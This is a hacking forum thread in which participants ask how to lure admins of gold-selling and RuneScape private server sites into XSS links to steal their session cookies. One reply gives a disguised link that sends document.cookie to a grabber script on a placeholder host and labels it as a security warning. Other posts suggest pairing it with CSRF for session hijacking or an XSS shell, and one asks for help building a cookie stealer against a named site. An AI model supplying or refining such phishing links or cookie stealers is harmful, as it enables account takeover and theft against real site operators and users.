XSS Social Engineering

Rakeya

So... lately I've been scanning for XSS vulnerabilities in websites, and I would like to know what would be the best route to actually getting an admin to fall for the threat. Like, what thread should I make that can attract admins directly into the thread to get their cookies :D. BTW, the websites I am targeting are gold-selling websites and RuneScape private server websites/forums.
 
Code:
[url=http://www.site.com/grabber.php?i=+document.cookie]www.site.com/Security-risk-in-forum.php[/ur]

Depending on what dav methods are used, you can combine with CSRF and successfully hijack the session easily :) Hell, you could even set up an XSS shell if it's persistent XSS.
 
Can you help me set up a cookie stealer? I have an XSS vulnerability to guy4game.com
 
Most websites have patched this so-called cookie stealer, so gl getting something out of it, but as error mentioned, I would suggest setting up an XSS shell.
 
I've targeted websites that haven't patched this. Underground websites and websites that work into selling gaming items don't spend their time bulking up their security. And also, just because you patch one part of the website with an XSS vulnerability doesn't mean the entire website can't be XSS'd. I've already tested the XSS onmouseover with a command prompt script, but I need to know how to set up a cookie stealer.
 